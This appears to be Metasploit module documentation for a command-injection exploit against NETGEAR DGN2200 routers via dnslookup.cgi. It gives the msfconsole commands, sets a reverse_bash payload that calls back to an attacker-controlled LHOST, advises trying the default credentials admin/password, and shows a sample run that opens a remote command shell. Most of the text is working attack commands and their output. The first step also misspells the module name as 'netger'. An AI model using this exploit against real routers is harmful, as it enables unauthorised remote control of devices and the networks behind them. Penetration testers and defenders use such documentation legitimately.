3.2 KiB
Vulnerable Application
NETGEAR DGN2200v1, DGN2200v2, DGN2200v3, DGN2200v4 routers
Verification Steps
- start
msfconsole use exploit/linux/http/netger_dnslookup_cmd_execset RHOST 192.168.1.1<--- Router IPset USERNAME xxxx(see here)set PASSWORD xxxx(see here)set PAYLOAD cmd/unix/reverse_bashset LHOST 192.168.1.xset LPORT xxxxrun- Get a session
Options
USERNAME
The USERNAME option sets the username to authenticate the request with.
The command injection will not succeed if the username and password are not correct.
The default username for NETGEAR Routers is admin. If you don't know the credentials,
your best bet will be to use the default username and password.
PASSWORD
The PASSWORDoptions sets the password to authenticate the request with.
The command injection will not succeed if the username and password are not correct.
The default password for NETGEAR Routers is password. If you don't know the credentials,
your best bet will be to use the default username and password.
Advanced Options
HOSTNAME
The request is went with a host_name POST parameter. This option sets this parameter.
The default is www.google.com. The reason for the parameter is that the file that this
vulnerability is located in (dnslookup.cgi) actually needs a domain to resolve, or else
the injection won't work.
Scenarios
What it should look like against a vulnerable router.
msf > use exploit/linux/http/netgear_dnslookup_cmd_exec
msf exploit(netgear_dnslookup_cmd_exec) > options
Module options (exploit/linux/http/netgear_dnslookup_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME yes Username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 NETGEAR DDGN2200 Router
msf exploit(netgear_dnslookup_cmd_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netgear_dnslookup_cmd_exec) > set USERNAME admin
USERNAME => admin
msf exploit(netgear_dnslookup_cmd_exec) > set PASSWORD password
PASSWORD => password
msf exploit(netgear_dnslookup_cmd_exec) > run
[*] Started reverse TCP double handler on 192.168.1.9:4444
[+] Router is a NETGEAR router (DGN2200v1)
[*] Sending payload...
[*] Command shell session 1 opened (192.168.1.9:4444 -> 192.168.1.9:53352) at 2017-03-02 19:36:47 -0500